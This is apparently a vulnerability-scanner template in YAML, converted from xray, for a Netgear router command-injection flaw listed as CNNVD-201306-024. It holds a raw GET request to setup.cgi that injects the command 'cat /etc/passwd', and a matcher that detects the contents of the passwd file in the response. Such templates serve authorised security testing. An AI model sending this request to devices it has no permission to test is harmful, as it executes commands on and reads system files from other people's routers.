id: poc-yaml-netgear-cnnvd-201306-024

info:
  name: poc-yaml-netgear-cnnvd-201306-024
  author: test007
  severity: low
  tags: xray-converted,ct-332062
  reference:
    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201306-024

http:
  - raw:
      - |
        GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%20/etc/passwd&curpath=/&currentsetting.htm=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"